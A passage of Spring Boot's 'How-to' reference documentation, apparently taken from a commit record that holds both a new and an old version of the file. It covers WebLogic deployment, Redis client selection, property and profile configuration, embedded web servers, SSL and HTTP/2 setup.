moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`), then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. 
In that case, we suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. Spring\nBoot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"lettuce\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"redis.clients:jedis\")\n\t\t\/\/ ...\n\t}\n----\n","old_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. 
Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks for the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle it.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware`, respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to "`do the right thing`", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. 
In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read the available external configuration options from there. The\n`@ConfigurationProperties` annotation has a `prefix` attribute that acts as a prefix for\nthe external property names. Thus, `ServerProperties` has `prefix="server"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. 
A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See "`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (e.g. servlet API) off the classpath. If you cannot do\nthat (for example, if you run two applications from the same code base), then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. 
See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `$\\{placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. 
For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application does not start\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see "`<<spring-boot-features.adoc#boot-features-external-config>>`" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument, and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. 
You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugin` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for the `application.properties`\ndirectly, you may also want to change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. On those two platforms, the `PORT` environment variable is set\nautomatically, and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee "`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs="verbatim,quotes,attributes"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. 
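\n\nAs an illustrative sketch (assuming an `Application` class of your own), the builder can\nadd a profile on top of those configured elsewhere:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder(Application.class)\n\t\t\t.profiles("production")\n\t\t\t.run(args);\n----\n\n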
Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. 
This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you need to include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disable the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behavior, configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. 
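\n\nFor example, the following sketch in `application.properties` switches the HTTP\nendpoints off:\n\n[source,properties,indent=0]\n----\n\tserver.port=-1\n----\n\n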
Switching off the HTTP endpoints in this way is sometimes useful for testing.\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes), use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get the port and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Unlike in a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. 
Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout of the box by JDK 8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. So you\nmust <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0, HTTP\/2 is supported without any additional requirement on JDK 8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x, which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are installed on the host operating system.\n\nIf it is not already available, the library folder must be made available on the JVM\nlibrary path. You can do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. See the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation] for\nmore details.\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-starter-webflux` starter uses Reactor Netty as a server by default.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime 